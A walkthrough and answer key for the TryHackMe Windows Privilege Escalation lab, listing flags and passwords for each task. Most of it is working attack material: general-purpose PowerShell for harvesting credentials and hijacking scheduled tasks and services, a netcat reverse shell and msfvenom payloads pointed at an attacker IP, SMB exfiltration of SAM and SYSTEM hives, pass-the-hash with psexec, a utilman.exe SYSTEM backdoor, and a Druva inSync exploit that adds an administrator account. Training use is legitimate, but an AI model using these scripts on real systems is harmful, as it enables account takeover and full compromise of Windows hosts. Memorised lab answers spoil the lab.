Windows Privilege Escalation
This guide contains the answers, and the steps needed to reach them, for the TryHackMe Windows Privilege Escalation room.
Table of contents
- Windows Privilege Escalation
- Harvesting Passwords from Usual Spots
- Other Quick Wins
- Abusing Service Misconfigurations
- Abusing dangerous privileges
- Abusing vulnerable software
- Tools of the Trade
Windows Privilege Escalation
- Users that can change system configurations are part of which group?
This answer can be found in the text.
Click for answer
Administrators
- The SYSTEM account has more privileges than the Administrator user (aye/nay)
This answer can be found in the text.
Click for answer
aye
Harvesting Passwords from Usual Spots
- A password for the julia.jones user has been left in the PowerShell history. What is the password?
The PSReadLine history file under the user's AppData folder keeps every interactive PowerShell command, including any that carried a password on the command line; printing it with type from cmd is enough.
Click for answer
ZuperCkretPa5z
- A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?
First we open the config file at C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config and search it for any mention of the db_admin account; a connection string in an IIS web.config typically carries the database password in clear text.
Click for answer
098n0x35skjD3
- There is a saved password on your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.
Looking through the stored credentials with cmdkey /list, we can see that Mike's credentials are indeed on the system.
Now we can spawn a shell as this user with runas /savecred (Credential Manager supplies the password, so we are never prompted for it) and view the flag.
Click for answer
THM{WHAT_IS_MY_PASSWORD}
- Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?
PuTTY does not store SSH passwords, but it does store proxy credentials with each saved session in the registry under HKCU\Software\SimonTatham\PuTTY\Sessions; querying that key for the proxy settings reveals the saved password for thom.smith.
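The four spots this section visits, gathered into one PowerShell script. This is an added example, not part of the room or of this write-up: the history file path and the PuTTY registry key are the Windows and PuTTY defaults, the web.config roots are the Framework Config folders named above plus C:\inetpub\wwwroot as an assumed IIS site root, and the runas line at the end assumes cmdkey really does show an entry for mike.katz.

```powershell
function Get-PSReadLineHistory {
    # PSReadLine appends every interactive line to this per-user file, passwords included.
    $hist = Join-Path $env:APPDATA 'Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt'
    if (Test-Path -LiteralPath $hist) { Get-Content -LiteralPath $hist }
}

function Find-WebConfigSecrets {
    param([string[]]$Roots = @("$env:windir\Microsoft.NET\Framework64\v4.0.30319\Config",
                               "$env:windir\Microsoft.NET\Framework\v4.0.30319\Config",
                               'C:\inetpub\wwwroot'))   # last root is an assumed IIS site path
    # A connectionString in an IIS web.config carries the database password in clear text.
    Get-ChildItem -Path $Roots -Filter web.config -Recurse -ErrorAction SilentlyContinue |
        Select-String -Pattern 'connectionString|password' |
        ForEach-Object { '{0}:{1}: {2}' -f $_.Path, $_.LineNumber, $_.Line.Trim() }
}

function Get-SavedWindowsCredentials {
    # Credential Manager entries. A "Domain:interactive=<user>" target can be used with
    # runas /savecred without ever learning the password itself.
    cmdkey /list | Select-String -Pattern 'Target:|User:'
}

function Get-PuttySessions {
    # PuTTY never stores the SSH password, but proxy credentials are saved per session.
    $key = 'HKCU:\Software\SimonTatham\PuTTY\Sessions'
    if (-not (Test-Path $key)) { return }
    Get-ChildItem $key | ForEach-Object {
        $s = Get-ItemProperty -LiteralPath $_.PSPath
        [pscustomobject]@{
            Session       = [uri]::UnescapeDataString($_.PSChildName)   # names are %-encoded
            HostName      = $s.HostName
            ProxyUsername = $s.ProxyUsername
            ProxyPassword = $s.ProxyPassword
        }
    }
}

Get-PSReadLineHistory
Find-WebConfigSecrets
Get-SavedWindowsCredentials
Get-PuttySessions | Format-Table -AutoSize

# Assumed, as in the text, that cmdkey lists an entry for mike.katz; /savecred then
# takes the stored secret from Credential Manager, so there is no password prompt:
# runas /savecred /user:mike.katz cmd.exe
```

Run it from the low-privilege shell you already have; the harvesting functions need nothing beyond the current user's own profile and HKCU, which is why these locations are worth checking before any of the service or privilege abuses below.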
Click for answer
CoolPass2021
Other Quick Wins
- What is the taskusr1 flag?
First we query the task scheduler (schtasks /query with verbose output) to learn what the misconfigured task runs and which user it runs as.
Using icacls on that file we can see our permissions on it; our user has modify rights, so we can edit it.
Now we edit the bat file so that it launches our reverse shell instead.
The last thing to do is start our listener and run the task manually (schtasks /run); the task executes as taskusr1, so the shell we get back runs with that user's rights.
Now we can navigate to that user's desktop and read the flag.
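The scheduled-task check and the follow-up, as an added PowerShell example (not the room's or this write-up's own commands). It enumerates every registered task whose executable, or a script passed as an argument, the current user can write to, which is the condition the icacls step above verifies by hand for one file. The task name vulntask, the script path C:\tasks\schtask.bat and the netcat location C:\tools\nc64.exe in the hijack function are assumptions; use whatever the enumeration reports and whatever you staged.

```powershell
function Test-WritableFile([string]$Path) {
    # Ask the kernel, not icacls: open for write and close without writing anything.
    try { [IO.File]::Open($Path, 'Open', 'Write').Close(); $true } catch { $false }
}

function Find-WritableTaskActions {
    # For each registered task, the executable and any script named in its arguments
    # are what the task's principal will run; if we can write to one, we run as them.
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }          # COM-handler actions have no Execute
            $targets = @($action.Execute)
            if ($action.Arguments) { $targets += $action.Arguments -split '\s+' }
            foreach ($t in $targets) {
                $p = [Environment]::ExpandEnvironmentVariables($t.Trim('"'))
                if (-not $p) { continue }
                if ((Test-Path -LiteralPath $p -PathType Leaf) -and (Test-WritableFile $p)) {
                    [pscustomobject]@{
                        Task     = $task.TaskPath + $task.TaskName
                        RunsAs   = $task.Principal.UserId
                        Writable = $p
                    }
                }
            }
        }
    }
}

function Invoke-TaskHijack {
    # Overwrite the writable script with a reverse shell and fire the task by hand.
    # Defaults are assumptions; the listener is the attacker IP used in this write-up.
    param(
        [string]$TaskName = 'vulntask',
        [string]$Script   = 'C:\tasks\schtask.bat',
        [string]$Payload  = 'C:\tools\nc64.exe -e cmd.exe 10.18.78.136 4444'
    )
    Set-Content -Path $Script -Value $Payload
    schtasks /run /tn $TaskName      # runs as the task's principal; the shell comes back on 4444
}

Find-WritableTaskActions | Format-Table -AutoSize
# Start "nc -lvp 4444" on the attacker box first, then:
# Invoke-TaskHijack -TaskName 'vulntask' -Script 'C:\tasks\schtask.bat'
```

The write test opens the file for write access and closes it again, so it reports exactly what a later overwrite would be allowed to do without changing anything; a task that points at a file in a directory we can write to (but whose file we cannot) is a separate case, since we could still rename or replace the file there.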
Click for answer
THM{TASK_COMPLETED}
Abusing Service Misconfigurations
- Get the flag on svcusr1's desktop.
Let's first query the service configuration (sc qc) to find the executable it runs, and check with icacls whether we have permission to modify that executable.
We do, so we build our reverse shell payload with msfvenom. The exe-service format matters: a service binary must answer the service control manager, and a plain exe would be terminated after the start-up timeout.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.78.136 LPORT=1337 -f exe-service -o rev-svc.exe
python3 -m http.server 8080
nc -nlvp 1337
After setting up the HTTP server and the listener we use PowerShell on the target (wget, the Invoke-WebRequest alias) to transfer the file.
Now we back up the original executable and move our own into its place; the icacls grant makes sure the service account can read and execute the new file.
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F
The last thing to do is stop the service and start it again (sc stop / sc start); the service then launches our payload, which connects back to our listener.
Now we can look for the flag on the users desktop.
Click for answer
THM{AT_YOUR_SERVICE}
- Get the flag on svcusr2's desktop.
The binary path of the Disk Sorter Enterprise service is unquoted and contains spaces, so when the service starts Windows tries C:\MyPrograms\Disk.exe before reaching the real executable. We first check the permissions on C:\MyPrograms to confirm that we can write there.
Now we create another reverse shell, transfer it to the target, and move it into place under the name Windows will try first. Lastly, we give everyone permission to run the file.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.78.136 LPORT=1337 -f exe-service -o rev-svc2.exe
python3 -m http.server 8080
wget http://10.18.78.136:8080/rev-svc2.exe -OutFile rev-svc2.exe
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F
Then we start our listener and stop/start the service to receive the connection.
Now, we only have to look for and read the flag.
Click for answer
THM{QUOTES_EVERYWHERE}
- Get the flag on the Administrator's desktop.
First we check the service's DACL with accesschk from the Sysinternals suite.
Looks like we (BUILTIN\Users) have SERVICE_ALL_ACCESS on the service, which includes SERVICE_CHANGE_CONFIG: we are allowed to change its configuration.
Now we create another reverse shell, transfer it to the target, and give everyone permission to run it. This time no file has to be overwritten: with sc config we point the service's binPath at our executable and set the account it runs under to LocalSystem.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.78.136 LPORT=1337 -f exe-service -o rev-svc3.exe
python3 -m http.server 8080
wget http://10.18.78.136:8080/rev-svc3.exe -OutFile rev-svc3.exe
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
Then we start our listener and stop/start the service to receive the connection, which now runs as SYSTEM.
Now, we only have to look for and read the flag.
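The three service misconfigurations of this section (writable service binary, unquoted path with spaces, weak service DACL) checked in one added PowerShell script. This is not the room's or this write-up's code: it replaces the by-hand sc qc / icacls / accesschk steps with one pass over every service. The SDDL parsing follows the output of sc sdshow, and the service name in the follow-up comments at the end is a placeholder for whatever the table reports.

```powershell
function Test-Writable([string]$Path) {
    # Ask the kernel instead of parsing icacls. A file is opened for write and closed;
    # for a directory a temporary file is created and removed. Nothing else changes.
    try {
        if (Test-Path -LiteralPath $Path -PathType Container) {
            $tmp = Join-Path $Path ([IO.Path]::GetRandomFileName())
            [IO.File]::Create($tmp).Close(); Remove-Item -LiteralPath $tmp; return $true
        }
        [IO.File]::Open($Path, 'Open', 'Write').Close(); return $true
    } catch { return $false }
}

function Get-ServiceBinary([string]$PathName) {
    # '"C:\x\svc.exe" -k args' -> C:\x\svc.exe ; unquoted -> everything up to the first .exe
    if ($PathName -match '^"([^"]+)"')  { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

function Get-UnquotedPathCandidates([string]$PathName) {
    # For the unquoted C:\MyPrograms\Disk Sorter Enterprise\disksrs.exe the service
    # control manager tries C:\MyPrograms\Disk.exe, then C:\MyPrograms\Disk Sorter.exe,
    # before the real binary. Return those candidates in the order they are tried.
    if ($PathName.StartsWith('"')) { return }
    $parts = (Get-ServiceBinary $PathName) -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) { ($parts[0..($i - 1)] -join ' ') + '.exe' }
}

function Get-ServiceDaclIssues([string]$Name) {
    # sc sdshow prints the service's security descriptor as SDDL. Rights that matter:
    # DC = SERVICE_CHANGE_CONFIG (rewrite binPath/obj), WD/WO = rewrite the DACL/owner,
    # GA = generic all. Trustees worth flagging: WD Everyone, BU Users, AU Authenticated
    # Users, IU Interactive, or an explicit SID (possibly our own user or a group of ours).
    $sddl = (sc.exe sdshow $Name 2>$null | Where-Object { $_ -match '^D:' }) -join ''
    foreach ($m in [regex]::Matches($sddl, '\(A;[^;]*;([^;]*);;;([^)]+)\)')) {
        $rights, $who = $m.Groups[1].Value, $m.Groups[2].Value
        if (($who -in 'WD', 'BU', 'AU', 'IU') -or ($who -like 'S-1-*')) {
            if ($rights -match 'DC|WD|WO|GA') { "$who has $rights" }
        }
    }
}

function Find-ServiceMisconfigs {
    foreach ($svc in Get-CimInstance Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ServiceBinary $svc.PathName
        if ((Test-Path -LiteralPath $exe -PathType Leaf) -and (Test-Writable $exe)) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Issue = 'writable binary'; Detail = $exe }
        }
        foreach ($c in Get-UnquotedPathCandidates $svc.PathName) {
            if (Test-Writable (Split-Path -Path $c -Parent)) {
                [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Issue = 'unquoted path'; Detail = "drop payload at $c" }
            }
        }
        foreach ($d in Get-ServiceDaclIssues $svc.Name) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Issue = 'weak DACL'; Detail = $d }
        }
    }
}

Find-ServiceMisconfigs | Format-Table -AutoSize

# Follow-up per finding (<svc> and the payload path are whatever the table reported and
# whatever you staged; the sc.exe config line is the step the DACL case needs):
#   writable binary : move the original aside, copy the exe-service payload over it,
#                     then  sc.exe stop <svc>; sc.exe start <svc>
#   unquoted path   : copy the payload to the "drop payload at" path, then stop/start
#   weak DACL (DC)  : sc.exe config <svc> binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
#                     sc.exe stop <svc>; sc.exe start <svc>
```

The RunsAs column is what decides the value of each finding: a writable binary of a service running as a low-privileged virtual account is not a path to SYSTEM, while SERVICE_CHANGE_CONFIG lets you choose the account yourself, which is why the DACL case sets obj= LocalSystem.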
Click for answer
THM{INSECURE_SVC_CONFIG}
Abusing dangerous privileges
In this task we use three different privileges to get administrator rights. After that it is trivial to find the flag.
- Get the flag on the Administrator's desktop.
SeBackup / SeRestore
Checking our privileges with whoami /priv shows SeBackupPrivilege and SeRestorePrivilege.
These grant read and write access to any file regardless of its DACL (backup semantics), so we can save the SAM and SYSTEM registry hives to our own profile folder with reg save; the live hive files under System32\config are locked, so a plain copy would fail even with the privilege.
Now we start an SMB server on our attack machine using impacket and transfer the files to it.
impacket-smbserver -smb2support -username THMBackup -password CopyMaster555 public share
copy sam.hive \\10.18.78.136\public
copy system.hive \\10.18.78.136\public
Again using impacket, this time secretsdump run against the two hive files in LOCAL mode, we extract the Administrator's NTLM hash.
With this hash we can perform a Pass-the-Hash attack against the target machine using psexec; no cracking is needed.
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5 Administrator@10.10.8.101
SeTakeOwnership
We can use this privilege to take ownership of Utilman.exe, the accessibility helper that the logon screen launches as SYSTEM, and replace it with a copy of cmd.exe.
Both executables live in C:\Windows\System32. We take ownership with takeown, grant ourselves full control with icacls (an owner can always rewrite the DACL), and copy cmd.exe over utilman.exe.
Now we have taken ownership of Utilman.exe, gotten full permissions, and replaced it with cmd.exe.
Locking the screen and clicking the Ease of Access button now spawns a command prompt running as SYSTEM instead of the accessibility menu.
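The SeTakeOwnership step as an added PowerShell example (not the room's commands): takeown, icacls, a backup copy and the cmd.exe overwrite, plus a restore function so the accessibility menu can be put back afterwards. The backup path under $env:TEMP is an assumption.

```powershell
$Target = Join-Path $env:windir 'System32\utilman.exe'
$Backup = Join-Path $env:TEMP   'utilman.exe.bak'     # assumed backup location

function Restore-Utilman {
    # Put the real binary back. Ownership stays with us unless SeRestorePrivilege is
    # also held (then icacls /setowner "NT SERVICE\TrustedInstaller" would return it).
    Copy-Item -LiteralPath $Backup -Destination $Target -Force
}

# 1. SeTakeOwnershipPrivilege lets us become the owner regardless of the current DACL
takeown /f $Target
# 2. an owner can always rewrite the DACL: grant ourselves full control
icacls $Target /grant "$($env:USERNAME):F"
# 3. keep the original so Restore-Utilman can undo the change
Copy-Item -LiteralPath $Target -Destination $Backup -Force
# 4. the logon screen launches utilman.exe as SYSTEM; make that launch cmd.exe
Copy-Item -LiteralPath (Join-Path $env:windir 'System32\cmd.exe') -Destination $Target -Force
# 5. lock the screen, then click the Ease of Access icon to get the SYSTEM prompt
#    (the argument is quoted because PowerShell would otherwise split it at the comma)
rundll32.exe 'user32.dll,LockWorkStation'
```

Because the swapped binary is launched by winlogon for any session that reaches the lock or logon screen, run Restore-Utilman as soon as you have what you need; leaving it in place hands a SYSTEM shell to anyone who can reach the console or RDP logon screen.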
SeImpersonate / SeAssignPrimaryToken
For this we abuse the web shell we already have running: its service account has these privileges set, and whoami /priv should confirm this.
Next, we start a listener on our machine.
Now we run RogueWinRM, which listens on the WinRM port (5985, so this only works while the real WinRM service is not listening there) and waits for the BITS service to connect to it as SYSTEM; because our process holds SeImpersonatePrivilege it can impersonate the SYSTEM token from that connection and use it to run netcat, which connects back to our listener with a command shell.
Click for answer
THM{SEFLAGPRIVILEGE}
Abusing vulnerable software
- Get the flag on the Administrator's desktop.
We first use wmic (wmic product) to list the installed programs and their versions, then investigate which one has a known local privilege escalation.
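An added example of the software inventory step in PowerShell (not from the room or this write-up): it reads the Uninstall registry keys instead of running wmic product, because the Win32_Product class only lists MSI packages and triggers a consistency check (and possibly a repair) of each one as it enumerates. The key paths are the Windows defaults.

```powershell
function Get-InstalledSoftware {
    # Both views are needed on 64-bit Windows: native installs and 32-bit (WOW6432Node).
    # Entries without a DisplayName are updates and component stubs, not programs.
    $keys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*',
            'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
    Get-ItemProperty -Path $keys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName } |
        Select-Object DisplayName, DisplayVersion, Publisher, InstallLocation |
        Sort-Object DisplayName
}

Get-InstalledSoftware | Format-Table -AutoSize

# Narrow it down once a candidate is known, e.g. the Druva client used in this task:
Get-InstalledSoftware | Where-Object { $_.DisplayName -like '*inSync*' }
```

The version column is what you compare against the vendor's fix notes or the exploit's stated affected range before running anything; InstallLocation tells you where the service binaries live, which is also useful for the service checks above.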
In this exercise the vulnerable program is Druva inSync. Its client runs an RPC service as SYSTEM on localhost port 6064 that executes a path sent to it; the provided exploit uses a ..\..\.. traversal to escape the Druva directory and run cmd.exe. We modify it so that the command creates a pwnd user and adds it to the local Administrators group.
$ErrorActionPreference = "Stop"
# Command the SYSTEM-level inSync service will run for us: create a local user and
# put it in Administrators (no password is set; see below).
$cmd = "net user pwnd /add & net localgroup administrators pwnd /add"
# The inSync client's RPC listener on localhost:6064 runs as SYSTEM.
$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)
# Message layout: fixed header, 4-byte little-endian RPC type (5), 4-byte length,
# then the command line as UTF-16LE.
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
# The path starts under the Druva directory; the ..\..\.. traversal is what walks
# back out of it to System32\cmd.exe.
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd")
$length = [System.BitConverter]::GetBytes($command.Length)
$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
$s.Close()
Remember to save this as a .ps1 file, then run it with PowerShell.
We can check that it worked by looking up the user (net user pwnd shows its group membership).
To get to the flag, open a command prompt as administrator. When asked for credentials, choose pwnd and leave the password blank, since net user was given none; Windows' blank-password restriction only applies to network logons, so a local elevation prompt accepts it.
Click for answer
THM{EZ_DLL_PROXY_4ME}